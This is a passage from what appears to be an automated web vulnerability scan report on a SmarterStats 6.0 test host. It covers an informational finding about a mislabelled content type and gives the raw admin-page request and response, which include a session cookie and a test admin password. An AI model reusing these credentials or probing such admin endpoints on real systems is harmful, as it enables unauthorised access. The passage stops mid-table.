$(function() { $('#ctl00_TPH_HyperTabStrip1').hyperTabStrip({"MultiPageClientID":"ctl00_MPH_MP1","FunctionMap":{},"PageViewMap":{"ctl00_TPH_HyperTabStrip1_HyperTabItem3":"ctl00_MPH_WebSettingsTab","ctl00_TPH_HyperTabStrip1_HyperTabItem1":"ctl00_MPH_AdministratorTab","ctl00_TPH_HyperTabStrip1_HyperTabItem2":"ctl00_MPH_AdministrativeEmailsTab"},"ClientCallbacks":{}}); });
modules['vmNotBlank_txt']='Must have a value';
$(function() {$vc({"lt":"Username","vcID":"ctl00_MPH_txtAdminUsername_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},false);});
modules['vmMustMatch_txt']='Must match {0}';
$(function() {$vc({"lt":"Confirm New Password ","vcID":"ctl00_MPH_txtAdminConfirmPassword_SettingText","VMs":["vmMustMatch"],"VPs":{"vmRequired":false,"vmMustMatch":"New Password ","vmMustMatchField":"ctl00_MPH_txtAdminNewPassword_SettingText"}},false);});
modules['vmOptional_txt']='Value is optional';
modules['vmEmail_txt']='Must be an email address';
modules['vmRequiredIfChecked_txt']='Must have a value if enabled';
$(function() {$vc({"lt":"Email Address","vcID":"ctl00_MPH_txtProblemsEmailAddress_SettingText","VMs":["vmOptional","vmEmail","vmRequiredIfChecked"],"VPs":{"vmRequiredCheckbox":"ctl00_MPH_chkProblemEmailsEnabled_SettingCheck","vmRequired":false}},false);});
$(function() {$vc({"lt":"SMTP Server","vcID":"ctl00_MPH_txtSmtpServer_SettingText","VMs":["vmOptional","vmRequiredIfChecked"],"VPs":{"vmRequiredCheckbox":"ctl00_MPH_chkProblemEmailsEnabled_SettingCheck","vmRequired":false}},false);});
//]]>
</script>
</form>
</body>
</html>


10. Content type incorrectly stated
There are 61 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly, analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results and, if the content contains any user-controllable data, may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


10.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSite.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain HTML.

Request

POST /Admin/frmSite.aspx?SiteId=1&popup=true HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx?SiteId=1&popup=true
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=
Content-Length: 30101

ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24BPH%24btnSave&ctl00%24TPH%24HyperTabStrip1%24SelectedTab=ctl00_TPH_HyperTabStrip1_HyperTabItem1&ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00%24MPH%24txtDomainName_SettingText=hoyt.net&ctl00%24MPH%24txtDomainUrl_SettingText=&ctl00%24MPH%24lstServer_SettingDropDown=1&ctl00%24MPH%24lstStatus_SettingDropDown=start&ctl00%24MPH%24txtSmarterLogDirectory=C%3A%5CSmarterLogs&ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown=&ctl00%24MPH%24txtAdminNewUserName_SettingText=weirdo&ctl00%24MPH%24txtAdminNewPassword_SettingText=LL12345&ctl00%24MPH%24chkSeoEnabled_SettingCheck=on&ctl00%24MPH%24lstLogLocation_SettingDropDown=Local&ctl00%24MPH%24lstLogFormat_SettingDropDown=W3Cex&ctl00%24MPH%24lstMonthsToKeepSmStats_SettingDropDown=0&ctl00%24MPH%24txtExportLogDirectory=&ctl00%24MPH%24txtLogFileExportLocURL_SettingText=&ctl00%24MPH%24txtDefaultDocuments_SettingText=index.htm%0Aindex.html%0Adefault.asp%0Adefault.aspx&ctl00_MPH_grdLogLocations_HiddenInput=&ctl00_MPH_grdLogLocations_HiddenLSR=&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText=5&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText=5&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxRanking_SettingText=100&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%240=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%248=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2415=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%241=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%249=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2416=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%242=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2410=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2417=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%243=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2411=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2418=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%244=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2412=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2419=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%245=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2413=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2420=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%246=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2421=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%247=on&ctl00_MPH_grdLogStatus_HiddenInput=&ctl00_MPH_grdLogStatus_HiddenLSR=&ctl00_MPH_grdSeoStatus_HiddenInput=&ctl00_MPH_grdSeoStatus_HiddenLSR=&__EVENTTARGET=ctl00%24BPH%24btnSave&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=[...]&__ASYNCPOST=true&

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Mon, 11 Oct 2010 21:18:40 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 63047

1|#||4|11|updatePanel|ctl00_UpdatePanel1|
               
           |1411|updatePanel|ctl00_TPH_UpdatePanel1|
           
<!-- HyperTabStrip -->
<div class='htsTabStrip htsTabBar'><ul id='ctl00_TPH_HyperTabStrip1'>
   <li class='htsItem htsFirst htsSelected' id='ctl00_TPH_HyperTabStrip1_HyperTabItem1'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Options</span></span></a></li>
   <li class='htsItem ' id='ctl00_TPH_HyperTabStrip1_HyperTabItem2'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Log Options</span></span></a></li>
   <li class='htsItem ' id='ctl00_TPH_HyperTabStrip1_HyperTabItem3'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Log Locations</span></span></a></li>
   <li class='htsItem ' id='ctl00_TPH_HyperTabStrip1_HyperTabItem5'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>SEO Options</span></span></a></li>
   <li class='htsItem ' id='ctl00_TPH_HyperTabStrip1_HyperTabItem7'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Log Status</span></span></a></li>
   <li class='htsItem htsLast' id='ctl00_TPH_HyperTabStrip1_HyperTabItem8'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>SEO Processing Status</span></span></a></li>
</ul>
<input type="hidden" name="ctl00$TPH$HyperTabStrip1$SelectedTab" id="ctl00_TPH_HyperTabStrip1_SelectedTab" value="ctl00_TPH_HyperTabStrip1_HyperTabItem1" /><div class='htsClear'><div class='ie6fix'>&nbsp;</div></div></div>

       |28417|updatePanel|ctl00_MPH_UpdatePanel5|
           
           <a id="ctl00_MPH_btnUpdateIISImport" href="javascript:__doPostBack(&#39;ctl00$MPH$btnUpdateIISImport&#39;,&#39;&#39;)" style="display: none"></a>
           <a id="ctl00_MPH_btnRefresh" href="javascript:__doPostBack(&#39;ctl00$MPH$btnRefresh&#39;,&#39;&#39;)" style="display: none"></a>
           
<!-- HyperMultiPage -->
<div class='' id='ctl00_MPH_MP1'>
   <input type="hidden" name="ctl00$MPH$VisiblePage" id="ctl00_MPH_VisiblePage" value="ctl00_MPH_OptionsTab" />
               <div id='ctl00_MPH_OptionsTab' class='' >
       <span id="ctl00_MPH_OptionsTab">
                   <table id="ctl00_MPH_tblAdminMain" class="SettingsContainer" border="0">
           <tr id="ctl00_MPH_txtDomainName">
               <td id="ctl00_MPH_txtDomainName_Label" class="Indent Fixed">Site Name</td><td id="ctl00_MPH_txtDomainName_Setting" class="Setting"><input name="ctl00$MPH$txtDomainName_SettingText" type="text" value="vilnerable.smarterstats.6.0.host" size="50" id="ctl00_MPH_txtDomainName_SettingText" class="text" /></td>
           </tr><tr id="ctl00_MPH_txtDomainUrl">
               <td id="ctl00_MPH_txtDomainUrl_Label" class="Indent Fixed">Site Url</td><td id="ctl00_MPH_txtDomainUrl_Setting" class="Setting"><input name="ctl00$MPH$txtDomainUrl_SettingText" type="text" size="50" id="ctl00_MPH_txtDomainUrl_SettingText" class="text" /></td>
           </tr><tr id="ctl00_MPH_txtSiteId">
               <td id="ctl00_MPH_txtSiteId_Label" class="Indent Fixed">Site ID</td><td id="ctl00_MPH_txtSiteId_Setting" class="Setting"><span id="ctl00_MPH_txtSiteId_ReadOnlyLabel">1</span></td>
           </tr><tr id="ctl00_MPH_lstServer">
               <td id="ctl00_MPH_lstServer_Label" class="Indent Fixed">Server</td><td id="ctl00_MPH_lstServer_Setting" class="Setting"><select name="ctl00$MPH$lstServer_SettingDropDown" id="ctl00_MPH_lstServer_SettingDropDown">
                   <option selected="selected" value="1">localhost</option>

               </select></td>
           </tr><tr id="ctl00_MPH_lstStatus">
               <td id="ctl00_MPH_lstStatus_Label" class="Indent Fixed">Current State</td><td id="ctl00_MPH_lstStatus_Setting" class="Setting"><select name="ctl00$MPH$lstStatus_SettingDropDown" id="ctl00_MPH_lstStatus_SettingDropDown">
                   <option selected="selected" value="start">Started</option>
                   <option value="paused">Paused</option>
                   <option value="disabled">Disabled</option>

               </select></td>
           </tr><tr id="ctl00_MPH_exSettingSmarterLogs">
               <td id="ctl00_MPH_exSettingSmarterLogs_Label" class="Indent Fixed">SmarterLog Path</td><td class=" Setting"><input name="ctl00$MPH$txtSmarterLogDirectory" type="text" value="C:\SmarterLogs" size="40" id="ctl00_MPH_txtSmarterLogDirectory" />
                               <input type="button" value="Browse" onclick="SmarterLogBrowse()" />
                           </td>
           </tr><tr id="ctl00_MPH_lstTimeZone">
               <td id="ctl00_MPH_lstTimeZone_Label" class="Indent Fixed">Time Zone</td><td id="ctl00_MPH_lstTimeZone_Setting" class="Setting"><span id="ctl00_MPH_lstTimeZone_ReadOnlyLabel">(GMT-06:00) Central Time (US & Canada)</span></td>
           </tr><tr id="ctl00_MPH_ddlChangeSiteAdmin">
               <td id="ctl00_MPH_ddlChangeSiteAdmin_Label" class="Indent Fixed">Site Admin</td><td id="ctl00_MPH_ddlChangeSiteAdmin_Setting" class="Setting"><select name="ctl00$MPH$ddlChangeSiteAdmin_SettingDropDown" onchange="javascript:setTimeout(&#39;__doPostBack(\&#39;ctl00$MPH$ddlChangeSiteAdmin_SettingDropDown\&#39;,\&#39;\&#39;)&#39;, 0)" id="ctl00_MPH_ddlChangeSiteAdmin_SettingDropDown">
                   <option selected="selected" value="">New User</option>
                   <option value="hoytnet">hoytnet</option>

               </select></td>
           </tr>
       </table>
                   <table id="ctl00_MPH_tblAdminCreate" class="SettingsContainer" border="0">
           <tr id="ctl00_MPH_txtAdminNewUserName">
               <td id="ctl00_MPH_txtAdminNewUserName_Label" class="Indent Fixed">Site Admin Username</td><td id="ctl00_MPH_txtAdminNewUserName_Setting" class="Setting"><input name="ctl00$MPH$txtAdminNewUserName_SettingText" type="text" value="weirdo" id="ctl00_MPH_txtAdminNewUserName_SettingText" class="text" /></td>
           </tr><tr id="ctl00_MPH_txtAdminNewPassword">
               <td id="ctl00_MPH_txtAdminNewPassword_Label" class="Indent Fixed">Site Admin Password</td><td id="ctl00_MPH_txtAdminNewPassword_Setting" class="Setting"><input name="ctl00$MPH$txtAdminNewPassword_SettingText" type="password" id="ctl00_MPH_txtAdminNewPassword_SettingText" class="text" autocomplete="off" /></td>
           </tr>
       </table>
                   <table id="ctl00_MPH_SettingsContainer5" class="SettingsContainer" border="0">
           <tr id="ctl00_MPH_chkSeoEnabled">
               <td id="ctl00_MPH_chkSeoEnabled_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkSeoEnabled_Setting" class="Setting"><input id="ctl00_MPH_chkSeoEnabled_SettingCheck" type="checkbox" name="ctl00$MPH$chkSeoEnabled_SettingCheck" checked="checked" onclick="javascript:setTimeout(&#39;__doPostBack(\&#39;ctl00$MPH$chkSeoEnabled_SettingCheck\&#39;,\&#39;\&#39;)&#39;, 0)" /><label for="ctl00_MPH_chkSeoEnabled_SettingCheck">Enable SEO</label></td>
           </tr>
       </table>
               </span></div>
   
               <div id='ctl00_MPH_LogOptionsTab' class='' style='display:none'>
       <span id="ctl00_MPH_LogOptionsTab">
                   <table id="ctl00_MPH_SettingsContainer2" class="SettingsContainer" border="0">
           <tr id="ctl00_MPH_lstLogLocation">
               <td id="ctl00_MPH_lstLogLocation_Label" class="Indent Fixed">Log Location</td><td id="ctl00_MPH_lstLogLocation_Setting" class="Setting"><select name="ctl00$MPH$lstLogLocation_SettingDropDown" onchange="javascript:setTimeout(&#39;__doPostBack(\&#39;ctl00$MPH$lstLogLocation_SettingDropDown\&#39;,\&#39;\&#39;)&#39;, 0)" id="ctl00_MPH_lstLogLocation_SettingDropDown">
                   <option selected="selected" value="Local">Local Path or UNC Path</option>
                   <option value="FTP">FTP</option>

               </select></td>
           </tr><tr id="ctl00_MPH_lstLogFormat">
               <td id="ctl00_MPH_lstLogFormat_Label" class="Indent Fixed">Log Format</td><td id="ctl00_MPH_lstLogFormat_Setting" class="Setting"><select name="ctl00$MPH$lstLogFormat_SettingDropDown" id="ctl00_MPH_lstLogFormat_SettingDropDown">
                   <option selected="selected" value="W3Cex">IIS - W3Cex Log Format</option>
                   <option value="IIS">IIS - Microsoft IIS Log Format</option>
                   <option value="NCSA">IIS - NCSA Common Log Format</option>
                   <option value="ApacheCLF">Apache - Common Log Format</option>
                   <option value="ApacheNCSAEx">Apache - NCSA Extended Log Format</option>
                   <option value="IPlanetCLF">IPlanet - Common Log Format</option>
                   <option value="CLF">Other - Common Log Format</option>

               </select></td>
           </tr><tr id="ctl00_MPH_lstMonthsToKeepSmStats">
               <td id="ctl00_MPH_lstMonthsToKeepSmStats_Label" class="Indent Fixed">Auto-Deletion</td><td id="ctl00_MPH_lstMonthsToKeepSmStats_Setting" class="Setting"><select name="ctl00$MPH$lstMonthsToKeepSmStats_SettingDropDown" id="ctl00_MPH_lstMonthsToKeepSmStats_SettingDropDown">
                   <option selected="selected" value="0">Never Delete</option>
                   <option value="1">Delete after 1 months</option>
                   <option value="2">Delete after 2 months</option>
                   <option value="3">Delete after 3 months</option>
                   <option value="4">Delete after 4 months</option>
                   <option value="5">Delete after 5 months</option>
                   <option value="6">Delete after 6 months</option>
                   <option value="7">Delete after 7 months</option>
                   <option value="8">Delete after 8 months</option>
                   <option value="9">Delete after 9 months</option>
                   <option value="10">Delete after 10 months</option>
                   <option value="11">Delete after 11 months</option>
                   <option value="12">Delete after 12 months</option>
                   <option value="13">Delete after 13 months</option>
                   <option value="14">Delete after 14 months</option>
                   <option value="15">Delete after 15 months</option>
                   <option value="16">Delete after 16 months</option>
                   <option value="17">Delete after 17 months</option>
                   <option value="18">Delete after 18 months</option>
                   <option value="19">Delete after 19 months</option>
                   <option value="20">Delete after 20 months</option>
                   <option value="21">Delete after 21 months</option>
                   <option value="22">Delete after 22 months</option>
                   <option value="23">Delete after 23 months</option>
                   <option value="24">Delete after 24 months</option>
                   <option value="25">Delete after 25 months</option>
                   <option value="26">Delete after 26 months</option>
                   <option value="27">Delete after 27 months</option>
                   <option value="28">Delete after 28 months</option>
                   <option value="29">Delete after 29 months</option>
                   <option value="30">Delete after 30 months</option>
                   <option value="31">Delete after 31 months</option>
                   <option value="32">Delete after 32 months</option>
                   <option value="33">Delete after 33 months</option>
                   <option value="34">Delete after 34 months</option>
                   <option value="35">Delete after 35 months</option>
                   <option value="36">Delete after 36 months</option>

               </select></td>
           </tr><tr id="ctl00_MPH_ExtensibleSetting1">
               <td id="ctl00_MPH_ExtensibleSetting1_Label" class="Indent Fixed">Export Directory</td><td class=" Setting"><input name="ctl00$MPH$txtExportLogDirectory" type="text" size="40" id="ctl00_MPH_txtExportLogDirectory" />
                               <input type="button" value="Browse" onclick="ExportLogBrowse()" />
                           </td>
           </tr><tr id="ctl00_MPH_txtLogFileExportLocURL">
               <td id="ctl00_MPH_txtLogFileExportLocURL_Label" class="Indent Fixed">Export Url</td><td id="ctl00_MPH_txtLogFileExportLocURL_Setting" class="Setting"><input name="ctl00$MPH$txtLogFileExportLocURL_SettingText" type="text" size="40" id="ctl00_MPH_txtLogFileExportLocURL_SettingText" class="text" /></td>
           </tr><tr id="ctl00_MPH_chkStripAfterSemi">
               <td id="ctl00_MPH_chkStripAfterSemi_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkStripAfterSemi_Setting" class="Setting"><input id="ctl00_MPH_chkStripAfterSemi_SettingCheck" type="checkbox" name="ctl00$MPH$chkStripAfterSemi_SettingCheck" /><label for="ctl00_MPH_chkStripAfterSemi_SettingCheck">Enable removal of URL items after semicolon (used for jsessionid)</label></td>
           </tr><tr id="ctl00_MPH_txtDefaultDocuments">
               <td id="ctl00_MPH_txtDefaultDocuments_Setting" class="Indent Setting" colspan="2"><span class='Label'>Default Documents (one per line)<br /></span><textarea name="ctl00$MPH$txtDefaultDocuments_SettingText" rows="4" cols="50" id="ctl00_MPH_txtDefaultDocuments_SettingText" class="text">
index.htm
index.html
default.asp
default.aspx</textarea></td>
           </tr>
       </table>
               </span></div>
   
               <div id='ctl00_MPH_LogLocationsTab' class='' style='display:none'>
       <span id="ctl00_MPH_LogLocationsTab">
                   <span id="ctl00_MPH_ctxLogLocations">
<!-- HyperMenu -->
       <div class='hmMenuBar '><div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmMenu hmMenuBar hmSub hmContext hmList' id='ctl00_MPH_ctl02' name='ctl00$MPH$ctl02' style='z-index:800'>
           <li class='hmItem hmFirst' id='ctl00_MPH_ctl02_hm0' style='z-index: 800'><a class='hmA hmHasChildren' href='#'>Add<span class='hmArrow'></span></a>
           <div class='hmScroller'><div class='hmScrollUp'></div><ul class='hmList hmSub'>
               <li class='hmItem hmFirst hmLast' id='ctl00_MPH_ctl02_hm0_hm0' style='z-index: 800'><a class='hmA' href='#'>Log Location</a></li>
           </ul><div class='hmScrollDown'></div></div>
           </li>
           <li class='hmItem' id='ctl00_MPH_ctl02_hm1' style='z-index: 800'><a class='hmA' href='#'>Edit</a></li>
           <li class='hmItem hmLast' id='ctl00_MPH_ctl02_hm2' style='z-index: 800'><a class='hmA' href='#'>Delete</a></li>
       </ul>
       <div class='hmScrollDown'></div></div>
       </div>
       </span>
                   <div id="ctl00_MPH_UpdatePanel3">
           
                           
<div class="HyperGridWrapper" id="ctl00_MPH_grdLogLocations">
<div class="HyperGrid">
<table class="HyperGrid" id="ctl00_MPH_grdLogLocations_Table">
<thead>
<tr><th scope="col" class="showsel lc CheckBoxColumn" style="overflow: hidden"><input type="checkbox" id="ctl00_MPH_grdLogLocationsCheckAll" name="ctl00$MPH$grdLogLocationsCheckAll" /></th><th scope="col" style="overflow: hidden">Full Path</th><th scope="col" class="rc leftpad" style="overflow: hidden">Log Wildcard</th></tr>
</thead>
<tbody>
<tr class="firstrow"><td class="showsel lc CheckBoxColumn"><input type="checkbox" id="ctl00_MPH_grdLogLocations_CB64_OTg3ZTY2NDQzZTUxNDk5MGE4YWZjZmI0NTZhMjMyYzA-" name="ctl00_MPH_grdLogLocations_CB64_OTg3ZTY2NDQzZTUxNDk5MGE4YWZjZmI0NTZhMjMyYzA-" /></td><td>c:\inetpub\logs\logfiles\W3SVC1</td><td class="rc leftpad">*.log</td></tr>
</tbody>
</table>
<input type="hidden" name="ctl00_MPH_grdLogLocations_HiddenInput" id="ctl00_MPH_grdLogLocations_HiddenInput" value="" /><input type="hidden" name="ctl00_MPH_grdLogLocations_HiddenLSR" id="ctl00_MPH_grdLogLocations_HiddenLSR" value="" />
</div>
</div>

                       
       </div>
               </span></div>
   
               <div id='ctl00_MPH_LogFTPTab' class='' style='display:none'>
       <span id="ctl00_MPH_LogFTPTab">
                   
               </span></div>
   
               <div id='ctl00_MPH_SeoOptionsTab' class='' style='display:none'>
       <span id="ctl00_MPH_SeoOptionsTab">
                   <table id="ctl00_MPH_ucSiteSeoSettings_tblSEO" class="SettingsContainer" border="0">
           <tr id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxKeywords">
               <td id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxKeywords_Label" class="Indent Fixed">Max Keywords</td><td id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxKeywords_Setting" class="Setting"><input name="ctl00$MPH$ucSiteSeoSettings$txtSeoMaxKeywords_SettingText" type="text" value="5" size="3" id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxKeywords_SettingText" class="text" /></td>
           </tr><tr id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxCompetitors">
               <td id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxCompetitors_Label" class="Indent Fixed">Max Competitors</td><td id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxCompetitors_Setting" class="Setting"><input name="ctl00$MPH$ucSiteSeoSettings$txtSeoMaxCompetitors_SettingText" type="text" value="5" size="3" id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxCompetitors_SettingText" class="text" /></td>
           </tr><tr id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxRanking">
               <td id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxRanking_Label" class="Indent Fixed">Max Position to Retrieve</td><td id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxRanking_Setting" class="Setting"><input name="ctl00$MPH$ucSiteSeoSettings$txtSeoMaxRanking_SettingText" type="text" value="100" size="3" id="ctl00_MPH_ucSiteSeoSettings_txtSeoMaxRanking_SettingText" class="text" /></td>
           </tr>
       </table>
                   <table id="ctl00_MPH_ucSiteSeoSearchEngineSettings_tblSeoSearchEngines" class="SettingsContainer" border="0">
           <tr id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines">
               <td id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_Label" class="Indent Fixed">Search Engines</td><td id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_Setting" class="Setting"><table id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox" class="CheckboxList" border="0">
                   <tr>
                       <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_0" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$0" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_0">Google</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_8" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$8" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_8">Google (DE)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_15" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$15" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_15">Google (JP)</label></td>
                   </tr><tr>
                       <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_1" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$1" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_1">Yahoo</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_9" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$9" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_9">Google (ES)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_16" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$16" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_16">Google (KR)</label></td>
                   </tr><tr>
                       <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_2" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$2" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_2">Ask</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_10" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$10" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_10">Google (FR)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_17" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$17" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_17">Google (MX)</label></td>
                   </tr><tr>
                       <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_3" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$3" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_3">Bing</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_11" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$11" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_11">Google (HK)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_18" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$18" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_18">Google (NL)</label></td>
                   </tr><tr>
